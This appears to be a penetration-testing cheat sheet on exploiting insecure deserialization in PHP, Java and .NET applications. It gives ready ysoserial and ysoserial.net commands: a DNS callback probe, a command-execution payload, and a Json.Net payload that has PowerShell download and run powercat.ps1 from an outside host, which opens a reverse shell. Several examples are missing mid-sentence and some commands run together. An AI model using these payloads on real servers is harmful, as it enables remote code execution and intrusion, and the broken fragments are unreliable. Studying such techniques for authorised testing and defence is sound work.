Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.
Deserialization is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.
In many occasions you can find some code in the server side that unserialize some object given by the user. In this case, you can send a malicious payload to make the server side behave unexpectedly.
You should read: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html for learn how to attack.
For example, in PHP any function of a class that starts with "__" will be executed when an object of that class is deserialized. So, setting some values for the attributes of that class could allow you to execute code.
You can read an explained PHP example here: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/
If you find some parameter being sent to the server like:
You could have found a vulnerable java application. Fingerprints/Magic Bytes of java serialised objects:
AC ED 00 05 in Hex
rO0 in Base64
Content-type header of an HTTP response set to
Using the BurpSuite extension gadgetprobe you can identify which libraries are available. With this information it could be easier to choose a payload to exploit the vulnerability. Note that the java classes list can be downloaded from the github (https://github.com/PortSwigger/gadgetprobe/tree/master/wordlists).
You can try exploit it using ysoserial (download here). Download the newest ysoserial.jar file and create a payloads. I would start using the "DNSURL" payload before a RCE payload to test if the injection is possible. Anyway, note that maybe the "DNSURL" payload is not working but other RCE payload is.
# PoC to make the application access an arbitrary URLjava -jar ysoserial-master-SNAPSHOT.jar DNSURL http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload# PoC to tryto execute commandsjava -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.0' > payload# Encode payload in base64base64 -w0 payload
If you have access to the source code check for common-collections and "InvokerTransformer" inside the application files:
cd /pat/applicationgrep -R InvokerTransformer .
Java LOVES sending serialized objects all over the place. For example:
In HTTP requests – Parameters, ViewState, Cookies, you name it.
RMI – The extensively used Java RMI protocol is 100% based on serialization
RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
JMX – Again, relies on serialized objects being shot over the wire
Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
You could also exploit serialised objects in .Net.
To created the payloads you can use: https://github.com/pwntester/ysoserial.net This tool is a little bit different from Javas one because it can generate Payloads in Binary format (like java ysoserial), in XML and in JSON. For identifying binary format in Base64 you should look for the initial string: AAEAAAD/////
For example, you could create a payload in JSON to execute a PS reverse shell with:
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/powercat.ps1')\"" -t
Take a look to this POST about how to try to exploit the __ViewState parameter of .Net to execute arbitrary code.
More info about .Net deserialization on this paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf